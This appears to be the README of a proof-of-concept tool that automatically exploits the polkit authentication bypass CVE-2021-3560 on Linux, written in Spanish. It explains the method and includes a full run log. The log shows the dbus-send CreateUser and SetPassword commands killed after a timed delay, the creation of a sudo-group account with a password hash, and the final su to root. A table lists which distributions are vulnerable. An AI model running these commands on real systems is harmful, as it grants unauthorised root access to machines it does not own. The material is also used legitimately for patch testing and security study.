
PoC de explotación automática para Polkit CVE-2021-3560
Automatic Explotation PoC for Polkit CVE-2021-3560
CVE-2021-3560 es una omisión de autenticación en polkit que permite a un usuario no privilegiado invocar métodos privilegiados mediante DBus. En este exploit se invocarán 2 métodos privilegiados proporcionados por accountsservice (CreateUser y SetPassword), lo que permite crear un usuario privilegiado, luego establecerle una contraseña y, finalmente, iniciar sesión como el usuario creado para elevar privilegios a root. https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin
[===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===]
[+] Current User: ubuntu
[+] Variable for Polkit Configuration
[*] Username : adminhs
[*] Password : admin1
[*] Fullname : admin
[+] Sending create user command to determine time execution
[*] Execution time: 0.018076ms
[+] Time to killing dbus-send setting to 0.009038ms
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $!
..................
[+] GOTCHAAA! User adminhs is created with sudo member group
[+] Getting UID from user: 1015
[+] Creating password with OpenSSL
$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0
[+] Triggering polkit to create password for adminhs
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1015 org.freedesktop.Accounts.User.SetPassword string:'$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0' string:admin & sleep 0.009038s ; kill $!
Failed to execute command: echo admin1 | su -c id adminhs
uid=1015(adminhs) gid=1015(adminhs) groups=1015(adminhs),27(sudo)
[+] GOTCHAAA! Success login with User adminhs & password: admin1
[+] You can login to root using su with user and password created before: su -c 'sudo su' adminhs
Cualquier sistema que tenga instalada la versión 0.113 (o posterior) de polkit es vulnerable. Esto incluye distribuciones populares como RHEL 8 con polkit versión 0.115 y Ubuntu 20.04 con polkit versión 0-105-26 (fork de Debian de polkit).
Licencia MIT
| Distribución | ¿Vulnerable? |
|---|---|
| RHEL 7 | No |
| RHEL 8 | Sí |
| Fedora 20 (o anterior) | No |
| Fedora 21 (o posterior) | Sí |
| Debian 10 (“buster”) | No |
| Debian testing (“bullseye”) | Sí |
| Ubuntu 18.04 | No |
| Ubuntu 20.04 | Sí |